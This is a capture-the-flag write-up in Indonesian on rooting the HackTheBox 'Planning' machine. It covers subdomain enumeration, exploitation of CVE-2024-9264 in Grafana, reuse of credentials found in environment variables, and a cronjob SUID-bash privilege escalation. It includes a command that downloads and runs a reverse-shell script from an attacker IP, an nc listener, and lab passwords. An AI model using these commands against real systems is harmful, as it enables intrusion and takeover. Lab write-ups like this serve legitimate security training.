HackTheBox Planning Writeup: CVE-2024-9264 Exploit & Root Access
Htb Planning Writeup
HTB Planning Writeup

πŸ•΅οΈβ€β™‚οΈ HackTheBox Planning Writeup & Recon

Writeup ini membahas HTB Linux machine berjudul Planning, sebuah easy box di HackTheBox. Tujuannya adalah mendapatkan root access menggunakan kombinasi Grafana remote code execution dan privilege escalation via cronjob.

Langkah awal saya mulai dengan nmap scan untuk mengidentifikasi port terbuka:

sudo nmap -sCV -T4 10.10.11.68 -oA nmap-initial

Hasilnya menunjukkan port SSH dan HTTP terbuka, mengarah ke domain planning.htb.

πŸ” FFUF Subdomain Enumeration dan Deteksi Grafana

Saya menjalankan ffuf subdomain enumeration untuk mencari subdomain tersembunyi:

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.10.11.68 -H "Host: FUZZ.planning.htb" -fs 178

Ditemukan subdomain grafana.planning.htb yang menjalankan Grafana v11.0.0. Versi ini diketahui memiliki vulnerability berbahaya.

🧨 CVE-2024-9264 Exploit pada Grafana v11.0.0

Grafana v11.0.0 rentan terhadap CVE-2024-9264 exploit, yang memungkinkan remote code execution. Saya memanfaatkan hackthebox grafana exploit ini untuk menjalankan reverse shell.

Skrip eksploitasi didapat dari GitHub - CVE-2024-9264.

python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c "wget http://10.10.14.128:8000/rev.sh -O /tmp/rev.sh && chmod +x /tmp/rev.sh && /tmp/rev.sh" http://grafana.planning.htb

πŸ“₯ Remote Shell via Grafana RCE

Setelah skrip dijalankan, remote shell via Grafana RCE berhasil terbuka. Saya mendapatkan shell sebagai root di dalam container Docker Grafana.

nc -nlvp 1337

Shell menunjukkan bahwa saya berada di dalam Docker container. Ini mengarah ke exploit docker container HTB untuk tahap selanjutnya.

πŸ” SSH Login dan HTB Planning Root Access

Saya menemukan environment variable di dalam container yang berisi password pengguna lokal:

GF_SECURITY_ADMIN_USER=enzo
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!

Dengan kredensial ini, saya login via SSH ke mesin utama dan berhasil masuk sebagai user enzo. Ini merupakan bagian dari HTB Planning exploit tutorial.

πŸ“ˆ Privilege Escalation via Cronjob

Saya menemukan file crontab.db yang mengatur cronjob harian dengan perintah root. Saya menanam SUID binary untuk mengeksekusi bash sebagai root.

cp /bin/bash /tmp/bash && chmod u+s /tmp/bash

Setelah beberapa menit, saya berhasil menjalankan ./bash -p dan mendapatkan akses root penuh. Teknik ini termasuk dalam Linux privilege escalation techniques yang umum digunakan di dunia nyata.

πŸ“ HTB Easy Machine Guide: Kesimpulan

Mesin Planning adalah contoh sempurna HTB easy machine guide yang mengajarkan tahapan HTB Linux machine writeup dari awal hingga root.

  • Recon: Subdomain dan service enumeration
  • Exploit: CVE-2024-9264 exploit untuk RCE pada Grafana v11.0.0
  • Privilege Escalation: Cronjob abuse dan SUID binary